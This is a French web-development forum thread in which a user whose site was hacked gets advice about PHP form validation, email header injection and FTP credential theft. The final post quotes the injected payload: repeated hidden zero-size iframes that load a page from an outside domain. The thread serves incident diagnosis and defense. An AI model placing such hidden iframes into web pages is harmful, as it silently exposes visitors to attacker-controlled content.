|
Publicité ' | |||||||||||||||||||||||
|
|
#1 | ||
|
Membre à l'essai
![]() Clémentine Inscription : juin 2006 Messages : 128 ![]() |
Sur mon site depuis la page index.html j'appelle en post le formulaire suivant:
Code :
Car je me suis fait hacké mon site (on a ajouté du code dans le fichier index.html) et je me demande si cela vient de là ? Merci. |
||
|
|
00
|
|
|
#2 |
|
Membre Expert
![]() Inscription : janvier 2006 Messages : 951 ![]() |
non ça ne peut pas venir que de ce bout de code. mais vu ce qu'on y lit c'est assez probable que le reste de la sécurité du site soit égale à 0.
__________________
PHP fait nativement la validation d'adresse électronique Utilisez le bouton résolu! |
|
|
10
|
|
|
#3 |
|
Membre Expert
![]() ![]() Emilie LefolEn recherche d'emploi Inscription : février 2009 Messages : 411 ![]() |
Te faire hacker à partir d'un simple formulaire qui envoie un mail sans faire d’insertion en bdd ou autre ??
Quand tu dis "hacker", que veux tu dire, que c'est-il passé... ?? Plus de précision pour mieux cerner le problème serais apprécié. Pour info, dans ton code, tu envoies du html dans un header d'email..., ce n'est pas comme ceci que cela s’écrit.
__________________
![]() - Si on criait sur la place publique les fautes de tout le monde, on ne pourrait plus fréquenter personne ! (Marcel Pagnol) - Technocrates, c’est les mecs que, quand tu leur poses une question, une fois qu’ils ont fini de répondre, tu comprends plus la question que t’as posée. (Coluche) |
|
|
00
|
|
|
#4 | |
|
Membre à l'essai
![]() Clémentine Inscription : juin 2006 Messages : 128 ![]() |
Citation:
Le reste du site n'est qu'en HTML. Concernant le piratage: Une balise <iframe> a été inséré en début de mon fichier index.html Et un fichier: ".php" est apparu sur le serveur. |
|
|
|
00
|
|
|
#5 |
|
Membre Expert
![]() ![]() Emilie LefolEn recherche d'emploi Inscription : février 2009 Messages : 411 ![]() |
Tout d'abord pour l'écriture. Je te laisse lire ce message qui servira ici d'exemple afin que tu constates que nul part on y mets du html....
http://www.developpez.net/forums/d79...der-from-mail/ De plus, dans ton code, tu fais tout par $_POST.. sans même vérifié les saisies... Facile de modifier tout ceci, voici un petit texte très enrichissant : http://www.phpsecure.info/v2/article...dersInject.php Mais bon, je doute fort que ton fichier php soit arrivé de ce côté... Peux-tu nous montrer cette page ? ainsi que l'iframe en question ? Tu es sur que personne ne possède tes mots de passes ? Ou alors, il y a de bonne chance que tu es chopé un virus sur ta machine à toi et que ce virus en as profité pour voler tes mots de passe Fillezilla....
__________________
![]() - Si on criait sur la place publique les fautes de tout le monde, on ne pourrait plus fréquenter personne ! (Marcel Pagnol) - Technocrates, c’est les mecs que, quand tu leur poses une question, une fois qu’ils ont fini de répondre, tu comprends plus la question que t’as posée. (Coluche) |
|
|
00
|
|
|
#6 |
|
Membre Expert
![]() Inscription : janvier 2006 Messages : 951 ![]() |
quand on écrit
$toto = $_POST['toto']; c'est se donner bonne conscience ou pour faire de la compatibilité pas cher avec la désactivation des magic_quote. sécurité = -1.
__________________
PHP fait nativement la validation d'adresse électronique Utilisez le bouton résolu! |
|
|
01
|
|
|
#7 | |
|
Débutant
Laurent Webmaster Inscription : octobre 2006 Messages : 2 873 ![]() |
Citation:
__________________
Il vaut mieux viser la perfection et la manquer que viser l'imperfection et l'atteindre. - Bertrand Russell |
|
|
|
00
|
|
|
#8 | |||
![]() ![]() |
Citation:
Citation:
J'ai déjà vu le cas : le serveur complet avait dû être ré-initialisé ... Citation:
-> Envoyer un mail en PHP : Créer un formulaire de contact simple -> fonction mail()
__________________
"Ce qui se conçoit bien s'énonce clairement - Et les mots pour le dire arrivent aisément." Nicolas Boileau-Despréaux, Homme de lettres français (1636-1711), principal théoricien de l'esthétique classique. Site perso Mes tutos DVP : Gestion-Affichage de Nouvelles - Affichage en tableau HTML - Fonctions de redimensionnement d'images
|
|||
|
|
00
|
|
|
#9 |
|
Membre Expert
![]() Inscription : janvier 2006 Messages : 951 ![]() |
non. on crois lire une donnée qui est sécurisée et en fait elle ne l'est pas. on perd une information. On s'est donné bonne conscience, on a presque envie de l'écrire toute crue dans une requete SQL... et on crée une faille par injection sql sans en rendre compte.
__________________
PHP fait nativement la validation d'adresse électronique Utilisez le bouton résolu! |
|
|
11
|
|
|
#10 | |
![]() ![]() Développeur Web Inscription : décembre 2006 Messages : 2 335 ![]() |
Citation:
Dans tous les deux cas suit bien les conseils de jreaux62.
__________________
Développeur | Zend Certified Engineer Étapes Pour mieux se servir du forum: 1. Commencez par lire les cours et tutoriels ; 2. Faites une recherche; 3. Faites un post si rien trouvé dans les deux étapes précédentes en respectant les règles; Nix>_Rien n'est plus pratique que la théorie |
|
|
|
10
|
|
|
#11 |
|
Membre à l'essai
![]() Clémentine Inscription : juin 2006 Messages : 128 ![]() |
@jreaux62: j'ai fait toutes les modifications préconisées. Pas de virus sur ma machine, ni de troyen.
J'ai un abonnement mutualisé 1and1. Je les ai prévenu, mais apparemment j'étais la seule victime de cela. Je n'ai plus l'iframe ni le .php de disponibles J'ai fait un backup de mes sources sur le serveur. Merci pour toutes vos informations ! Vous m'avez bien éclairez sur ce problème et sur le fait que mes sites sont pas sécurisés. Auriez vous un lien simple d'accès pour sécuriser toutes les données post ou get. Du genre $toto=fonction_secure($_POST['toto']); Je schématise mais bon c'est l'idée générale. |
|
|
00
|
|
|
#12 |
![]() ![]() |
-> Filtrage des données
-> Les filtres PHP : une fonctionnalité importante de sécurité -> une petite discussion : textarea et faille xss
__________________
"Ce qui se conçoit bien s'énonce clairement - Et les mots pour le dire arrivent aisément." Nicolas Boileau-Despréaux, Homme de lettres français (1636-1711), principal théoricien de l'esthétique classique. Site perso Mes tutos DVP : Gestion-Affichage de Nouvelles - Affichage en tableau HTML - Fonctions de redimensionnement d'images
|
|
|
00
|
|
|
#13 | ||
|
Membre à l'essai
![]() Clémentine Inscription : juin 2006 Messages : 128 ![]() |
Pour conclure ce topic, j'ai retrouvé les modifications effectuées sur mon serveur.
Pour info: ajout d'un fichier .php contenant Code :
Code :
<iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe> |
||
|
|
00
|
Copyright © 2000-2012 - www.developpez.com